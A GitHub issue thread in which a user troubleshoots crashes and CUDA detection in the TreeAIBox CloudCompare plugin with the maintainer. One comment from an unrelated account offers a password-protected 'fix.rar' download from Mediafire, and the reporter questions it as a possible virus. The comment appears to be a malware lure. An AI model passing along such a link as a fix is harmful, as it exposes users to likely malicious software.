### ISSUE TITLE
Program closes when trying to run the model

### ISSUE THREAD

**Issue by GakenouOF** [truebelief/cc-TreeAIBox-plugin#2]
Hello @truebelief, 

Thank you for working hard to make this tool publicly available. 

I successfully set up the program in cloudcompare, after several hours dealing with cloudcompare site-packages.  

I got the program running, downloaded the model and upon applying it to my point cloud, it shut down cloudcompare. I notice i am unable to tick the Use GPU (CUDA) option

![image](https://github.com/user-attachments/assets/21a65a71-48e5-4655-90bc-4f97b6fe0ebe)

I am using a computer with NVIDIA GeForce RTX 4070, CUDA version 12.6. I am not sure if that is the reason or the occasional flashing you already mentioned.

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by GakenouOF** [comment]
Can you explain what the link is for? Are you sending me some virus or what?

**Comment by truebelief** [comment]
@GakenouOF  Thank you for the prompt feedback. This is important! Could you try opening the Python Editor and try to see if the pytorch cuda is supported?

![image](https://github.com/user-attachments/assets/e5540681-482c-49aa-b19c-3528ef1a38d3)

**Comment by GakenouOF** [comment]
Hello @truebelief, 

Thank you for your quick response, i ran the code and it says false

**Comment by GakenouOF** [comment]
Hello @truebelief 

I solved the torch-cuda compartibility by using this "https://download.pytorch.org/whl/cu124" to install pytorch. 

Now the Use GPU (CUDA) is active but it cloudcompare still shut down, when i applied the model. 

![image](https://github.com/user-attachments/assets/2490b91d-7120-4fcb-9f64-9fac13795ac0)

**Comment by truebelief** [comment]
> Hello @truebelief
> 
> I solved the torch-cuda compartibility by using this "https://download.pytorch.org/whl/cu124" to install pytorch.
> 
> Now the Use GPU (CUDA) is active but it cloudcompare still shut down, when i applied the model.

Thanks for getting me updated! Could you first ensure no error reports for all the import functions below in the Python Editor?

```
import numpy as np
import numpy_indexed as npi

import torch
from torch.autograd import Variable
import torch.nn as nn
from functools import partial

from PyQt5 import QtWidgets, uic
from PyQt5.QtWidgets import  QStyledItemDelegate
from PyQt5.QtGui import QColor,QPalette
from PyQt5.QtCore import Qt
from PyQt5.QtCore import QUrl
from PyQt5.QtGui import QDesktopServices
from PyQt5.QtGui import QPixmap

from pathlib import Path
import pycc
import cccorelib

import laspy
import requests
import json
```
